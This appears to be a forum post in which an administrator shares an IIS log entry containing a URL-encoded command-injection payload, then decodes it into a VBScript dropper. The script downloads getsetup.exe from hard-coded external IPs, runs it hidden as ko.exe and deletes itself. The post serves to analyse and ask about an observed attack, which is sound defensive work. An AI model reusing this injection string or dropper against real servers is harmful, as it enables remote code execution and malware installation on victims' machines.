Hi,
I caught this one in a pre-production server's logs. Seems it is trying to get the root document, and trying to force your server to run various setup.exe programs from a host of sites (assuming your root document processes the search variable). Our site does not, as it is the default IIS 7.5 document (the "Welcome to IIS 7" page). The exploit is coming out of China (suprise suprise...).
I replaced the public IP of our server with x's to conceal its actual IP ;-)
In the server logs, I found:
2014-09-22 20:58:50 xxx.xxx.xx.xx GET / search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3DArray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.196.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3Dtrue%3Aquit%3Dfalse%3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsObject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%29%3AIf+xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E%3E200+then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3AsGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%28%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.ScriptFullName%29+%26+cscript+22222.vbs.} 80 - 122.228.207.244 - 200 0 0 421
Decoding the URI request string for the search== yields the following vbscript:
exec cmd.exe /c echo>22222.vbs
dim wait,quit,out
Set xml=CreateObject("Microsoft.XMLHTTP")
Set WshShell = Wscript.CreateObject("WScript.Shell")
DS=Array("123.108.109.100","123.108.109.100:53","123.108.109.100:443","178.33.196.164","178.33.196.164:53","178.33.196.164:443"
for each Url in DS
wait=true
quit=false
D(Url)
if quit then
exit
for
end if
next
Sub D(Url)
if IsObject(xml)=false then
Set xml=CreateObject("Microsoft.XMLHTTP")
end if
xml.Open "GET","http://"&Url&"/getsetup.exe",True
xml.OnReadyStateChange=GetRef("xmlstat")
out=Now
xml.Send()
while(wait and 60^>abs(datediff("s",Now,out)))
wscript.sleep(1000)
wend
End Sub
sub xmlstat()
If xml.ReadyState <>4 Then
exit sub
end if
wait=false
if xml.status<>200 then
exit sub
end if
quit=true
on error resume next
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xml.ResponseBody
sGet.SaveToFile "ko.exe",2
End sub
WshShell.run "ko.exe",0,0
Set fso =CreateObject("Scripting.Filesystemobject")
fso.DeleteFile(WScript.ScriptFullName) & cscript 22222.vbs
I'm guessing that this doesn't run unless your root page is a) dynamic, and b) has a search variable (and presumably, some sort of vulnerability?)?